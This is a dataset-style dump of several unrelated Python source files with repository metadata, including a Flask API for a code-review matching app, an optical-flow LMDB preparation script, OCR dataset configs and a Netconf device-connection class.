|
py
|
Python
|
finished/python_principles/05_type_check.py
|
UltiRequiem/daily-python-practice
|
31f72c45378be90b8fcadd30d7042819ee551a17
|
[
"MIT"
] | 8
|
2021-05-29T23:30:12.000Z
|
2021-09-24T03:25:44.000Z
|
finished/python_principles/05_type_check.py
|
UltiRequiem/daily-python-practice
|
31f72c45378be90b8fcadd30d7042819ee551a17
|
[
"MIT"
] | null | null | null |
finished/python_principles/05_type_check.py
|
UltiRequiem/daily-python-practice
|
31f72c45378be90b8fcadd30d7042819ee551a17
|
[
"MIT"
] | 6
|
2021-06-02T14:20:24.000Z
|
2021-08-19T00:49:26.000Z
|
"""
Your function should return True if both parameters are integers, and False otherwise.
"""
def only_ints(a, b) -> bool:
return type(a) == int and type(b) == int
def tests() -> None:
print(only_ints(4, 8))
print(only_ints(4, "u"))
print(only_ints("a", 4))
print(only_ints(4, True))
if __name__ == "__main__":
tests()
| 18.421053
| 86
| 0.62
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 110
| 0.314286
|
b0da89a6bb254fa22755c06a1a618c46fe33ed81
| 3,775
|
py
|
Python
|
media/limited_series.py
|
FellowHashbrown/MediaQueue
|
0844649709698c66b7ed14e70436b3830ab18627
|
[
"MIT"
] | null | null | null |
media/limited_series.py
|
FellowHashbrown/MediaQueue
|
0844649709698c66b7ed14e70436b3830ab18627
|
[
"MIT"
] | null | null | null |
media/limited_series.py
|
FellowHashbrown/MediaQueue
|
0844649709698c66b7ed14e70436b3830ab18627
|
[
"MIT"
] | null | null | null |
import os
from json import dump
from typing import List
from media import Episode, Show
from options import options
class LimitedSeries(Show):
"""A LimitedSeries is a Show that has only 1 Season of Episodes.
In this, only the Episodes need to be specified
:param name: The name of this LimitedSeries
:param episodes: A list of Episodes in this LimitedSeries
:param provider: The name of the streaming provider this LimitedSeries is located on
:param person: The person that is watching this LimitedSeries
:keyword started: Whether or not this LimitedSeries has been started (Defaults to False)
:keyword finished: Whether or not this LimitedSeries has been finished (Defaults to False)
:keyword json: The JSON object to load a LimitedSeries object from
:keyword filename: The JSON file to load a LimitedSeries object from
:raises FileNotFoundError: When the JSON file cannot be found
:raises KeyError: When the required parameters are missing from the JSON object
"""
FOLDER = "limitedSeries"
def __init__(self, name: str = None, provider: str = None,
person: str = None, episodes: List[Episode] = None,
*, started: bool = False, finished: bool = False,
json: dict = None, filename: str = None):
super().__init__(name, provider, person,
episodes=episodes,
started=started, finished=finished,
json=json, filename=filename)
def __str__(self):
return "LimitedSeries({}, {}, {}, {}, {}, {}, {})".format(
self.get_id(), self.get_name(),
self.get_provider(), self.get_person(),
"Started" if self.is_started() else "Not Started",
"Finished" if self.is_finished() else "Not Finished",
", ".join([str(episode) for episode in self.get_episodes()])
)
def __eq__(self, limited_series: 'LimitedSeries'):
if not isinstance(limited_series, LimitedSeries):
return False
return (limited_series.get_name() == self.get_name() and
{limited_series.get_episodes()} == {self.get_episodes()} and
limited_series.get_provider() == self.get_provider() and
limited_series.get_person() == self.get_person() and
limited_series.is_started() is self.is_started() and
limited_series.is_finished() is self.is_finished())
# # # # # # # # # # # # # # # # # # # # # # # # #
def to_csv(self) -> str:
"""Returns the CSV representation of this LimitedSeries object"""
show_csv = "\"{}\",{},{},{},{}".format(
self.get_name(), self.get_provider(),
self.get_person(),
self.is_started(), self.is_finished()
)
episodes_csv = "\n".join(episode.to_csv() for episode in self.get_episodes())
return f"LimitedSeries\n{show_csv}\n{episodes_csv}"
def to_json(self) -> dict:
"""Returns the JSON representation of this LimitedSeries object"""
super_json = super().to_json()
super_json.pop("seasons") # A limited series shouldn't have Seasons
return super_json
def save(self):
"""Saves this LimitedSeries object into a JSON file"""
if not os.path.exists(f"{options.get_base_dir()}/data"):
os.mkdir(f"{options.get_base_dir()}/data")
if not os.path.exists(f"{options.get_base_dir()}/data/{LimitedSeries.FOLDER}"):
os.mkdir(f"{options.get_base_dir()}/data/{LimitedSeries.FOLDER}")
with open("{}/data/{}/{}.json".format(options.get_base_dir(), LimitedSeries.FOLDER, self.get_id()), "w") as jsonfile:
dump(self.to_json(), jsonfile, indent=4)
| 45.481928
| 125
| 0.625166
| 3,655
| 0.968212
| 0
| 0
| 0
| 0
| 0
| 0
| 1,546
| 0.409536
|
b0daa63a5af9ec548e408e77f43dd85ab4843906
| 462
|
py
|
Python
|
__findModuleLocations.py
|
simdevex/01.Basics
|
cf4f372384e66f4b26e4887d2f5d815a1f8e929c
|
[
"MIT"
] | null | null | null |
__findModuleLocations.py
|
simdevex/01.Basics
|
cf4f372384e66f4b26e4887d2f5d815a1f8e929c
|
[
"MIT"
] | null | null | null |
__findModuleLocations.py
|
simdevex/01.Basics
|
cf4f372384e66f4b26e4887d2f5d815a1f8e929c
|
[
"MIT"
] | null | null | null |
'''
Python program to find the location of Python modulesources
'''
#Location of Python module sources:
import imp
print("Location of Python os module sources:")
print(imp.find_module('os'))
print("\nLocation of Python sys module sources:")
print(imp.find_module('datetime'))
#List of directories of specific module:
import os
print("\nList of directories in os module:")
print(os.path)
print("\nList of directories in sys module:")
import sys
print(sys.path)
| 24.315789
| 59
| 0.75974
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 312
| 0.675325
|
b0dc67e2fb068fd1e2da407f360e7696247d97ff
| 8,104
|
py
|
Python
|
api.py
|
gitroulette/gitroulette
|
0c53cdf843b202efa7d0e7a3fcbcb0a7bc7f0b0b
|
[
"Apache-2.0"
] | null | null | null |
api.py
|
gitroulette/gitroulette
|
0c53cdf843b202efa7d0e7a3fcbcb0a7bc7f0b0b
|
[
"Apache-2.0"
] | null | null | null |
api.py
|
gitroulette/gitroulette
|
0c53cdf843b202efa7d0e7a3fcbcb0a7bc7f0b0b
|
[
"Apache-2.0"
] | null | null | null |
import json
import random
from flask import Blueprint
from flask import request
from flask import session
from sqlalchemy import and_
from sqlalchemy import or_
from urlparse import urlparse
# from flask import current_app
from gitRoulette import auth
from gitRoulette import models
from gitRoulette.utils import request_utils
api = Blueprint('api', __name__)
db = models.db
@api.route('/new_for_review', methods=['POST'])
@auth.login_required
def new_for_review():
if request.method == 'POST':
req_data = json.loads(request.data)
language_list = request_utils.get_url_languages(
req_data['url'], session['github_token'][0]).keys()
# FIXME: change name to description in post request
# FIXME: change time to be taken on the server
entry = models.Url(name=req_data['name'],
url=req_data['url'],
github_user=req_data['github_user'])
for l in language_list:
language = models.Language(language=l, url=entry)
db.session.add(language)
db.session.add(entry)
db.session.commit()
return str(entry.id)
@api.route('/remove_from_list', methods=['POST'])
@auth.login_required
def remove_from_queue():
req_data = json.loads(request.data)
url = models.Url.query.filter(
and_(models.Url.github_user == session['github_user'],
models.Url.name == req_data['name'])).first()
languages = url.languages.all()
for language in languages:
db.session.delete(language)
db.session.delete(url)
db.session.commit()
return "test"
@api.route('/new_something', methods=['POST'])
@auth.login_required
def new_something():
if request.method == 'POST':
req_data = json.loads(request.data)
github_user = models.GitUser.query.filter_by(
github_user=req_data['github_user']).first()
if github_user is None:
return "no user"
# checks if user is trying to add to himself
elif req_data['github_user'] == session['github_user']:
return "cannot add to yourself"
else:
something = github_user.somethings.filter_by(
comment_id=req_data['comment_id']).first()
if something is None:
something = models.Something(comment_id=req_data['comment_id'],
gituser=github_user)
db.session.add(something)
db.session.commit()
return "test"
@api.route('/somethings_by_url_id/<url_id>', methods=['GET'])
@auth.login_required
def somethings_by_url_id(url_id):
# TODO: maybe we need this for something
url = models.Url.query.filter_by(id=url_id).first()
somethings = [s.comment_id for s in url.somethings.all()]
return json.dumps({"somethings": somethings})
@api.route('/somethings_by_username/<username>', methods=['GET'])
@auth.login_required
def somethings_by_username(username):
github_user = models.GitUser.query.filter_by(github_user=username).first()
somethings = [s.comment_id for s in github_user.somethings.all()]
print(somethings)
return json.dumps({"somethings": somethings})
@api.route('/languages_by_url_id/<url_id>', methods=['GET'])
@auth.login_required
def languages_by_url_id(url_id):
url = models.Url.query.filter_by(id=url_id).first()
languages = url.languages.all()
language_list = [l.language for l in languages]
ret_val = {"languages": language_list}
return json.dumps(ret_val)
@api.route('/new_github_user', methods=['POST'])
@auth.login_required
def new_github_user():
# TODO: modify so that a user can add/remove/replace skills;
# TODO: case: no skills on github..
# TODO: add a dropdown with common skills.
if request.method == 'POST':
req_data = json.loads(request.data)
gituser = models.GitUser.query.filter_by(
github_user=session['github_user']).first()
if gituser is None:
gituser = models.GitUser(github_user=session['github_user'])
db.session.add(gituser)
for skill in req_data['skills']:
_s = models.Skill(skill=skill, gituser=gituser)
db.session.add(_s)
db.session.commit()
return "success"
@api.route('/comments_by_url_id/<url_id>')
@auth.login_required
def comments_by_url_id(url_id):
# FIXME: at the moment we only take pulls comments, no issues.
# issues will show comments in "conversation" too.
# Should we do another request if entry_type is pull?
url = models.Url.query.filter_by(id=url_id).first()
pathArray = urlparse(url.url).path.split('/')
github_user = pathArray[1]
project = pathArray[2]
entry_type = pathArray[3]
entry_id = pathArray[4]
endpoint = 'repos/' + github_user + "/" + project + "/"
endpoint += entry_type + "s/" + entry_id + "/comments"
comments = auth.github.get(endpoint)
# the response has nothing to do with the url_id restructure.
# needs work. we need a better standard
def lmbd(comment): comment.update({'url_name': url.name, 'url_id': url.id})
return json.dumps(
{project: [lmbd(comment) or comment for comment in comments.data]})
@api.route('/decline_comment', methods=['POST'])
@auth.login_required
def decline_comment():
req_data = json.loads(request.data)
url = models.Url.query.filter_by(id=req_data["url_id"]).first()
pathArray = urlparse(url.url).path.split('/')
github_user = pathArray[1]
project = pathArray[2]
entry_type = pathArray[3]
entry_id = pathArray[4]
endpoint = 'repos/' + github_user + "/" + project + "/"
endpoint += entry_type + "s/" + entry_id + "/comments"
post_data = {'body': 'No thanks!',
'in_reply_to': int(req_data["comment_id"])}
headers = {'Accept': 'application/json',
'Content-Type': 'application/json; charset=utf-8'}
resp = auth.github.post(endpoint, data=post_data, headers=headers,
format='json')
return json.dumps({"response": resp.data})
@api.route('/skills_by_username/<github_user>', methods=['GET'])
@auth.login_required
def skills_by_username(github_user):
endpoint = "/users/" + github_user + "/repos"
repos = auth.github.get(endpoint).data
languages = [language for repo in repos for language in
request_utils.get_url_languages(
repo["html_url"], session['github_token'][0]).keys()]
print(languages)
return json.dumps(list(set(languages)))
@api.route('/saved_skills_by_username/<github_user>', methods=['GET'])
@auth.login_required
def saved_skills_by_username(github_user):
user = models.GitUser.query.filter_by(github_user=github_user).first()
skills = user.skills.all()
skills_list = [s.skill for s in skills]
return json.dumps(list(set(skills_list)))
@api.route('/urls_by_username/<github_user>', methods=['GET'])
@auth.login_required
def saved_urls_by_username(github_user):
urls = models.Url.query.filter_by(github_user=github_user).all()
existing_urls = []
for url in urls:
entry = {'id': url.id,
'name': url.name,
'url': url.url,
'github_user': url.github_user}
existing_urls.append(entry)
return json.dumps(existing_urls)
@api.route('/url_to_review', methods=['GET'])
@auth.login_required
def url_to_review():
user = models.GitUser.query.filter_by(github_user=session['github_user']).first()
skills = user.skills.all()
# We need to have atleast one condition otherwise the query will return all.
if len(skills) == 0:
return ''
conditions = [getattr(models.Language, 'language').ilike('%{}%'.format(s.skill)) for s in skills]
q = models.Language.query.filter(or_(*conditions)).distinct(models.Language.url_id)
language_entries = q.all()
random_url_id = random.choice(language_entries).url_id
url = models.Url.query.filter_by(id=random_url_id).first()
return str(url.url)
| 32.15873
| 101
| 0.659057
| 0
| 0
| 0
| 0
| 7,686
| 0.948421
| 0
| 0
| 1,690
| 0.208539
|
b0ddf344239a48edf5e77538da1c1fa89461c624
| 1,556
|
py
|
Python
|
translator/logger.py
|
dNationCloud/jsonnet-translator
|
94d9d1b56d21a357fcab8adc555aa4630234d19c
|
[
"Apache-2.0"
] | 7
|
2021-04-14T11:30:03.000Z
|
2021-05-17T11:26:50.000Z
|
translator/logger.py
|
dNationCloud/jsonnet-translator
|
94d9d1b56d21a357fcab8adc555aa4630234d19c
|
[
"Apache-2.0"
] | 10
|
2021-01-14T07:18:55.000Z
|
2021-10-01T12:56:39.000Z
|
translator/logger.py
|
dNationCloud/kubernetes-jsonnet-translator
|
94d9d1b56d21a357fcab8adc555aa4630234d19c
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright 2020 The dNation Jsonnet Translator Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import logging.handlers
import sys
from pythonjsonlogger import jsonlogger
LOGGER_NAME = "translator"
LOG_FORMAT = "%(asctime)s - [%(levelname)-5s] - %(message)s"
FORMATTER = {
"default": logging.Formatter(LOG_FORMAT),
"json": jsonlogger.JsonFormatter(LOG_FORMAT),
}
def get_logger():
return logging.getLogger(LOGGER_NAME)
def get_console_handler(formatter):
console_handler = logging.StreamHandler(sys.stdout)
console_handler.setFormatter(formatter)
return console_handler
def set_logger(level, format):
"""Sets the threshold for the logger to defined level and format
Args:
level (str): Logger threshold.
format (str): Logger format.
Return:
None
"""
formatter = FORMATTER[format]
logger = logging.getLogger(LOGGER_NAME)
logger.setLevel(level)
logger.addHandler(get_console_handler(formatter))
logger.propagate = False
| 27.785714
| 77
| 0.737147
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 869
| 0.558483
|
b0de787d9d796dd2d84865af0e45d3952304b306
| 5,663
|
py
|
Python
|
models/test2/scripts/lmdb_data.py
|
Mehuli-Ruh11/Flownet_v1
|
17d517416a24f396a21e36e35e73abeb857451d2
|
[
"BSD-2-Clause"
] | 130
|
2016-10-28T18:37:14.000Z
|
2022-03-29T03:24:31.000Z
|
models/test2/scripts/lmdb_data.py
|
Mehuli-Ruh11/Flownet_v1
|
17d517416a24f396a21e36e35e73abeb857451d2
|
[
"BSD-2-Clause"
] | 34
|
2016-09-30T14:35:11.000Z
|
2019-01-06T12:02:17.000Z
|
models/test2/scripts/lmdb_data.py
|
Mehuli-Ruh11/Flownet_v1
|
17d517416a24f396a21e36e35e73abeb857451d2
|
[
"BSD-2-Clause"
] | 73
|
2016-06-24T10:51:51.000Z
|
2020-12-22T11:21:40.000Z
|
import numpy as np
import caffe
import flowlib as fl
import os
import lmdb
from PIL import Image
VERBOSE = 0
SUBPIXELFACTOR = 4
MIN_FLOW = -4.18505
THRESHOLD = 1e8
PATCH_SIZE = 'FULL'
def data2lmdb():
# define image and ground truth file
train_imagefile1 = 'data/Urban3/frame10.png' # specify 1st image file
train_imagefile2 = 'data/Urban3/frame11.png' # specify 2nd image file
train_labelfile = 'gt/Urban3/flow10.flo' # specify label file
test_imagefile1 = 'data/Grove2/frame10.png' # specify 1st image file
test_imagefile2 = 'data/Grove2/frame11.png' # sepcify 2nd image file
test_labelfile = 'gt/Grove2/flow10.flo' # specify test label file
# preprocessing
train_images = preprocess_image(train_imagefile1, train_imagefile2)
train_labels, max_label= preprocess_label(train_labelfile)
print("Maximum number of class in training set is: ", max_label + 1)
# Testing data
test_images = preprocess_image(test_imagefile1, test_imagefile2)
test_labels, test_max_label = preprocess_label(test_labelfile)
print("Maximum number of class in testing set is: ", test_max_label + 1)
## TRAINING
# read image
db = lmdb.open('train-image-lmdb-full', map_size=int(1e12))
with db.begin(write=True) as txn:
for i in range(len(train_images)):
image_data = caffe.io.array_to_datum(train_images[i])
txn.put('{:08}'.format(i), image_data.SerializeToString())
db.close()
# read label
db = lmdb.open('train-label-lmdb-full', map_size=int(1e12))
with db.begin(write=True) as txn:
for i in range(len(train_labels)):
label_data = caffe.io.array_to_datum(train_labels[i])
txn.put('{:08}'.format(i), label_data.SerializeToString())
db.close()
## TESTING
# read image
db = lmdb.open('test-image-lmdb-full', map_size=int(1e12))
with db.begin(write=True) as txn:
for i in range(len(test_images)):
image_data = caffe.io.array_to_datum(test_images[i])
txn.put('{:08}'.format(i), image_data.SerializeToString())
db.close()
# read label
db = lmdb.open('test-label-lmdb-full', map_size=int(1e12))
with db.begin(write=True) as txn:
for i in range(len(test_labels)):
label_data = caffe.io.array_to_datum(test_labels[i])
txn.put('{:08}'.format(i), label_data.SerializeToString())
db.close()
def preprocess_data(path, mode):
if mode == 'label':
folders = os.listdir(path)
folders.sort()
for folder in folders:
labelfile = os.path.join('gt', folder, 'flow10.flo')
labels, max_label = preprocess_label(p)
def preprocess_image(imagefile1, imagefile2):
# read image file
img1 = Image.open(imagefile1)
img2 = Image.open(imagefile2)
# Convert image file to array
im1 = np.array(img1)
im2 = np.array(img2)
# RGB to BGR for caffe
im1 = im1[:, :, ::-1]
im2 = im2[:, :, ::-1]
# Concatenate
img = np.concatenate((im1, im2), axis=2)
# Convert to caffe blob
img = img.transpose((2,0,1))
# Segment image into smaller patches
images = []
# check if patch size is compitible to the input image
height, width = img.shape[1], img.shape[2]
if PATCH_SIZE == 'FULL':
images.append(img)
else:
if height%PATCH_SIZE != 0 or width%PATCH_SIZE != 0:
raise
else:
for i in range(0, height/PATCH_SIZE):
for j in range(0, width/PATCH_SIZE):
im = img[:, PATCH_SIZE*i:PATCH_SIZE*(i+1), PATCH_SIZE*j:PATCH_SIZE*(j+1)]
images.append(im)
return images
def preprocess_label(labelfile):
# init
max_label = -1
labels = []
# read flow file
flow = fl.read_flow(labelfile)
height, width = flow.shape[0], flow.shape[1]
# TODO: processing vector u, horizontal flow only
# label patch : 32 x 32
# ground truth map size : 388 x 584 (12 x 18 patches)
# seperate GT map into patches
if PATCH_SIZE == 'FULL':
label, max_label = flow2label(flow[:, :, 0], SUBPIXELFACTOR)
labels.append(label)
else:
if height%PATCH_SIZE != 0 or width%PATCH_SIZE != 0:
raise
else:
for i in range(0, height/PATCH_SIZE):
for j in range(0, width/PATCH_SIZE):
patch = flow[PATCH_SIZE*i:PATCH_SIZE*(i+1),PATCH_SIZE*j:PATCH_SIZE*(j+1),0]
u = np.array(patch)
# find largest displacement
label, largest_label = flow2label(u, SUBPIXELFACTOR)
labels.append(label)
if largest_label > max_label:
max_label = largest_label
return labels, max_label
def flow2label(flow, subpixel_factor):
# security check
if len(flow.shape) > 2:
raise
# unknown flow, occlusion
idx = (abs(flow) > THRESHOLD)
flow[idx] = 0
# Convert flow to one direction
flow_nonnegtive = flow + abs(MIN_FLOW)
flow_nonnegtive[idx] = 0
# discretize flow at subpixel level
label = np.floor(flow_nonnegtive * subpixel_factor)
label = label.astype(np.uint8)
# get the largest label
max_label = max(-999, np.max(label))
print("maximum label is: ", max_label)
# convert to caffe format
label = np.expand_dims(label, axis=0)
return label, max_label
def find_max_min_flow(flow):
# security check
if len(flow.shape) > 2:
raise
# unknown flow, occlusion
idx = (abs(flow) > THRESHOLD)
flow[idx] = 0
max_flow = max(-999, np.max(flow))
min_flow = min(999, np.min(flow))
if VERBOSE:
print 'max_flow: ', max_flow
print 'min_flow: ', min_flow
return max_flow, min_flow
def read_lmdb(database_file):
"""
Read lmdb data
return content and shape
"""
db = lmdb.open(database_file, readonly=True)
with db.begin() as txn:
raw_data = txn.get(b'00000000') # get the first key value
datum = caffe.proto.caffe_pb2.Datum()
datum.ParseFromString(raw_data)
# convert string type data to actual data
# content now is a Nx1 array
content = np.fromstring(datum.data, dtype=np.uint8)
shape = [datum.channels, datum.height, datum.width]
return content, shape
| 27.357488
| 80
| 0.707046
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,464
| 0.25852
|
b0df7d5ad0499addaf0ae1570bc27728fffba61b
| 778
|
py
|
Python
|
configs/_base_/det_datasets/pool_icdar2013_icdar2015.py
|
andrgje/mmocr
|
26963dcf56b6cc842d097617a9dc1688b01fcaed
|
[
"Apache-2.0"
] | null | null | null |
configs/_base_/det_datasets/pool_icdar2013_icdar2015.py
|
andrgje/mmocr
|
26963dcf56b6cc842d097617a9dc1688b01fcaed
|
[
"Apache-2.0"
] | null | null | null |
configs/_base_/det_datasets/pool_icdar2013_icdar2015.py
|
andrgje/mmocr
|
26963dcf56b6cc842d097617a9dc1688b01fcaed
|
[
"Apache-2.0"
] | null | null | null |
dataset_type1 = 'IcdarDataset'
data_root1 = 'data/icdar15'
train1 = dict(
type=dataset_type1,
ann_file=f'{data_root1}/instances_training.json',
img_prefix=f'{data_root1}/imgs',
pipeline=None)
test1 = dict(
type=dataset_type1,
ann_file=f'{data_root1}/instances_validation.json',
img_prefix=f'{data_root1}/imgs',
pipeline=None)
dataset_type2 = 'IcdarDataset'
data_root2 = 'data/icdar13'
train2 = dict(
type=dataset_type2,
ann_file=f'{data_root2}/instances_training.json',
img_prefix=f'{data_root2}/imgs',
pipeline=None)
test2 = dict(
type=dataset_type2,
ann_file=f'{data_root2}/instances_validation.json',
img_prefix=f'{data_root2}/imgs',
pipeline=None)
train_list = [train1,train2]
test_list = [test1,test2]
| 22.882353
| 55
| 0.713368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 296
| 0.380463
|
b0e1dfb1774454a45bec65b7f4f0e603d7f1da9e
| 13,580
|
py
|
Python
|
lib/Protocol/EmNetconfProtocol.py
|
multi-service-fabric/element-manager
|
e550d1b5ec9419f1fb3eb6e058ce46b57c92ee2f
|
[
"Apache-2.0"
] | null | null | null |
lib/Protocol/EmNetconfProtocol.py
|
multi-service-fabric/element-manager
|
e550d1b5ec9419f1fb3eb6e058ce46b57c92ee2f
|
[
"Apache-2.0"
] | null | null | null |
lib/Protocol/EmNetconfProtocol.py
|
multi-service-fabric/element-manager
|
e550d1b5ec9419f1fb3eb6e058ce46b57c92ee2f
|
[
"Apache-2.0"
] | 1
|
2020-04-02T01:17:43.000Z
|
2020-04-02T01:17:43.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright(c) 2019 Nippon Telegraph and Telephone Corporation
# Filename: EmNetconfProtocol.py
'''
Protocol processing section (Netconf)
'''
import traceback
import time
import json
from ncclient import manager
from ncclient import operations
import GlobalModule
import EmNetconfClient
from EmCommonLog import decorater_log
from EmCommonLog import decorater_log_in_out
class EmNetconfProtocol(object):
'''
Protocol processing section (Netconf) class
'''
__CONNECT_OK = 1
__CONNECT_CAPABILITY_NG = 2
__CONNECT_NO_RESPONSE = 3
@decorater_log_in_out
def connect_device(self, device_info):
'''
Device connection control
Conduct SSH connection to applicable device as request information.
Explanation about parameter:
device_info: Device information
Platform name
OS
Firm version
Login ID
Password
IPv4 address for management
Prefix of IPv4 address for management
Device information to be used for ncclient.
(to be set only when necessary)
Port No. to be used for ncclient.
(to be set only when necessary)
Explanation about return value:
Connection result :
int (1:Normal, 2: Capability Abnormal 3:No response)
'''
parse_json = json.loads(device_info)
device_info_dict = parse_json["device_info"]
self.__device_ip = device_info_dict["mgmt_if_address"]
username = device_info_dict["username"]
password = device_info_dict["password"]
device_info = device_info_dict.get("device_info")
port_number = device_info_dict.get("port_number")
if device_info is not None:
device_params = {'name': str(device_info)}
else:
device_params = None
GlobalModule.EM_LOGGER.debug("device_params = %s", device_params)
if port_number is None:
port_number = 830
GlobalModule.EM_LOGGER.debug("port_number = %s", port_number)
result, timer_protocol = GlobalModule.EM_CONFIG.\
read_sys_common_conf("Timer_netconf_protocol")
if result is not True:
timeout_val = 60
GlobalModule.EM_LOGGER.debug(
"Netconf Protocol Timer default Setting: %s", timeout_val)
else:
timeout_val = timer_protocol / 1000
GlobalModule.EM_LOGGER.debug(
"Netconf Protocol Timer: %s", timeout_val)
result, timer_connection = GlobalModule.EM_CONFIG.\
read_sys_common_conf("Timer_connection_retry")
if result is not True:
retrytimer_val = 5
GlobalModule.EM_LOGGER.debug(
"Connection Retry Timer default Setting: %s", retrytimer_val)
else:
retrytimer_val = timer_connection / 1000.0
GlobalModule.EM_LOGGER.debug(
"Connection Retry Timer: %s", retrytimer_val)
result, retry_num = GlobalModule.EM_CONFIG.\
read_sys_common_conf("Connection_retry_num")
if result is not True:
retry_num_val = 5
GlobalModule.EM_LOGGER.debug(
"Connection Retry Num default Setting: %s", retry_num_val)
else:
retry_num_val = retry_num
GlobalModule.EM_LOGGER.debug(
"Connection Retry Num: %s", retry_num_val)
for count in range(retry_num_val):
try:
self.__connection = EmNetconfClient.connect_ssh(
host=self.__device_ip,
port=port_number,
username=username,
password=password,
timeout=timeout_val,
hostkey_verify=False,
device_params=device_params,
device_info=device_info_dict)
break
except Exception as exception:
GlobalModule.EM_LOGGER.debug(
"Connect Error:%s", str(type(exception)))
GlobalModule.EM_LOGGER.debug(
"Connect Error args: %s", str(exception.args))
GlobalModule.EM_LOGGER.debug(traceback.format_exc())
GlobalModule.EM_LOGGER.debug(
"Connection Wait Counter: %s", count)
time.sleep(retrytimer_val)
if count < (retry_num_val - 1):
continue
return self.__CONNECT_NO_RESPONSE
device_capability_list = self.__connection.server_capabilities
GlobalModule.EM_LOGGER.debug(
"device_capability_list: %s", device_capability_list)
capability_judge = False
for cap in self.__capability_list:
for device_cap in device_capability_list:
if cap == device_cap:
capability_judge = True
if capability_judge is not True:
GlobalModule.EM_LOGGER.debug(
"Connect Error:exceptions.MissingCapabilityError")
return self.__CONNECT_CAPABILITY_NG
self.__connection.raise_mode = operations.RaiseMode.NONE
GlobalModule.EM_LOGGER.info("107001 SSH Connection Open for %s",
self.__device_ip)
return self.__CONNECT_OK
@decorater_log_in_out
def send_control_signal(self, message_type, send_message):
'''
Transmit device control signal
Transmit Netconf to device and returns response signal.
Explanation about parameter:
message_type: Message type(response message)
discard-changes
validate
lock
unlock
get-config
edit-config
confirmed-commit
commit
send_message: Send message
get-config:XML format (<config></config>)
edit-config:XML format (<config></config>)
Not necessary in case of other message types.
Explanation about return value:
Send result : boolean (True:Normal,False:Abnormal)
REsponse signal : str (Netconf response signal
(Returns "NetconfSendOK" to return value 1
when rpc-error is received successfully.))
'''
is_judg_result, judg_message_type = self.__judg_control_signal(
message_type)
GlobalModule.EM_LOGGER.debug("__send_signal_judg:%s", is_judg_result)
GlobalModule.EM_LOGGER.debug("judg_message_type:%s", judg_message_type)
if is_judg_result is False:
GlobalModule.EM_LOGGER.debug("__send_signal_judg NG")
return False, None
GlobalModule.EM_LOGGER.debug("__send_signal_judg OK")
try:
if judg_message_type == "get_config":
GlobalModule.EM_LOGGER.debug("judg_message_type:get_config")
GlobalModule.EM_LOGGER.debug(
"send_message: %s", send_message)
receive_message = self.__connection.get_config(
source='running',
filter=('subtree', send_message)).data_xml
GlobalModule.EM_LOGGER.debug(
"receive_message: %s", receive_message)
GlobalModule.EM_LOGGER.debug(
"receive_message type: %s", type(receive_message))
elif judg_message_type == "edit_config":
GlobalModule.EM_LOGGER.debug("judg_message_type:edit_config")
GlobalModule.EM_LOGGER.debug(
"send_message: %s", send_message)
receive_message = self.__connection.edit_config(
config=send_message).xml
GlobalModule.EM_LOGGER.debug(
"receive_message: %s", receive_message)
GlobalModule.EM_LOGGER.debug(
"receive_message type: %s", type(receive_message))
elif judg_message_type == "confirmed_commit":
GlobalModule.EM_LOGGER.debug(
"judg_message_type:confirmed_commit")
is_send_result, return_value = \
GlobalModule.EM_CONFIG.read_sys_common_conf(
"Timer_confirmed-commit")
GlobalModule.EM_LOGGER.debug("read_sys_common:%s",
is_send_result)
if is_send_result is False:
GlobalModule.EM_LOGGER.debug("read_sys_common NG")
return False, None
GlobalModule.EM_LOGGER.debug("read_sys_common OK")
GlobalModule.EM_LOGGER.debug("return_value:%s", return_value)
return_value = return_value / 1000
receive_message = self.__connection.commit(
confirmed=True, timeout=str(return_value)).xml
GlobalModule.EM_LOGGER.debug(
"receive_message: %s", receive_message)
GlobalModule.EM_LOGGER.debug(
"receive_message type: %s", type(receive_message))
else:
GlobalModule.EM_LOGGER.debug("judg_message_type:%s",
judg_message_type)
try:
method = getattr(self.__connection, judg_message_type)
receive_message = method().xml
GlobalModule.EM_LOGGER.debug(
"receive_message: %s", receive_message)
GlobalModule.EM_LOGGER.debug(
"receive_message type: %s", type(receive_message))
except AttributeError:
GlobalModule.EM_LOGGER.debug("AttributeError:%s",
judg_message_type)
return False, None
GlobalModule.EM_LOGGER.info("107003 Sending %s to %s",
message_type, self.__device_ip)
except Exception as exception:
GlobalModule.EM_LOGGER.warning(
"207005 protocol %s Sending Error", message_type)
GlobalModule.EM_LOGGER.debug(
"Sending Error:%s", str(type(exception)))
return False, None
GlobalModule.EM_LOGGER.info("107002 Receiving rpc-reply from %s",
self.__device_ip)
return True, receive_message
@decorater_log_in_out
def disconnect_device(self):
'''
Device disconnection control
Disconnect from the device.
Explanation about parameter:
None
Explanation about return value:
Judgment result : boolean (True:Normal,False:Abnormal)
'''
try:
self.__connection.close_session()
except Exception as exception:
GlobalModule.EM_LOGGER.debug(
"Disconnect Error:%s", str(type(exception)))
return False
GlobalModule.EM_LOGGER.info("107004 SSH Connection Closed for %s",
self.__device_ip)
return True
@decorater_log
def __init__(self):
'''
Constructor
'''
self.__connection = None
self.__device_ip = None
self.__capability_list = \
('urn:ietf:params:netconf:base:1.0',
'urn:ietf:params:netconf:base:1.1')
@decorater_log
def __judg_control_signal(self, message_type):
'''
Control signal judgment
Make judgment on the message to be sent based on the message type.
Explanation about parameter:
message_type: Message type (response message)
discard-changes
validate
lock
unlock
get-config
edit-config
confirmed-commit
commit
Explanation about return value:
Judgment result : boolean (True:Normal,False:Abnormal)
Judgment message type : str
'''
message_list = ["discard-changes", "validate", "lock",
"unlock", "get-config", "edit-config",
"confirmed-commit", "commit"]
GlobalModule.EM_LOGGER.debug("message_type:%s", message_type)
if message_type in message_list:
GlobalModule.EM_LOGGER.debug("message_type Match")
judg_message_type = message_type.replace('-', '_')
return True, judg_message_type
GlobalModule.EM_LOGGER.debug("message_type UNMatch")
return False, None
